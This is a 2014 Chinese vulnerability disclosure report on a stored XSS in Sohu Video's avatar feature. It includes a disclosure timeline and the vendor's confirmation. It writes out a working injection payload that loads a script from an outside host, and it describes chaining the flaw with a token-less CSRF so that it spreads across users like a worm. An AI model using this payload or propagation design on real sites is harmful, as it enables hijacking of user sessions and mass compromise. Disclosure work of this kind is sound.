2014-03-21:细节已通知厂商并且等待厂商处理中
2014-03-21:厂商已经确认,细节仅向厂商公开
2014-03-31:细节向核心白帽子及相关领域专家公开
2014-04-10:细节向普通白帽子公开
2014-04-20:细节向实习白帽子公开
2014-05-05:细节向公众公开
存储型XSS配合另一漏洞构造请求可达到感染传播目的.全站影响高危!分分钟让几百万人看不了 乡村爱情.
详细说明:0x01
上传头像
0x02
点击保存,抓包如下
0x03
修改一下
0x04
看一下效果
起初以为到这步便是搞定了,未免太简单了 从发现到利用不到3分钟. 事实证明还是
too naive
1x01
其实漏洞确实是已经找出来了. 但要利用还有很长一段路.
首先想到的便是搜狐视频的主要业务 视频. 评论的时每人都有头像如果把这个头像带进去那就是结结实实的一个存储型XSS了.
你也一定以为是这样吧,但是现实就是这么残酷.
实际上评论头像是和用户头像分开的.应该是防止每次都去读取user表浪费资源吧,他的流程是这样的. 每隔一段时间同步一下用户的最新头像. 也就是说你新换头像去评论显示的还是老头像.
起初我等了一上午发现还是不更新便感觉不对了. 又注册了几个号进行测试发现有的号昵称变成了游客.有的号头像变成默认.起初以为是被封了.后来想想应该是同步时构造sql语句 src 中含有引号造成的.
OK 重新构造 xss 语句.
经过测试发现是双引号引起的.多次调试得到如下语句
http://223.img.pp.sohu.com.cn/p223/2014/3/21/4/10/4e4bca29bb884dbo_145b07deb95g201_00018_0.jpg?a=\" onload=$.getScript('//zuosi.me/zuo') a
大家可以注意一下a的位置 最后那个a 被当作属性解析出来把多余的引号带走了 所以不加是不行的.
1x02
来看一下效果,搜狐的小伙伴们表担心 那是张刮刮卡 文字颜色和背景色一样的
http://tv.sohu.com/20131105/n389579692.shtml
2x01
至此火已经放完了.我再来个助燃剂.
用户中心用户有6个历史头像,每个头像下有个按钮点击有会触发一个设置头像请求.非常棒 没有token.
这样我保存一个带有xss的头像方案.然后每个触发xss的用户头像都变为xss头像然后他在去评论.``` 相信我的服务器收件服务器永远起不来了
其实这里的CSRF可以单开一贴说事, 比如会被人利用恶意修改他人头像达到某种目的.不过这两个配合在一起威力才是真大.20 RANK真不高 给我加一起吧.
说着简单弄起来真心不容易,帮你们避免了巨大损失你们不表示表示?
求大礼品,高rank
↑↑↑↑↑↑↑↑↑
过滤
版权声明:转载请注明来源 Levine@乌云 漏洞回应 厂商回应:危害等级:高
漏洞Rank:20
确认时间:2014-03-21 11:02
厂商回复:感谢支持。
最新状态:暂无
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;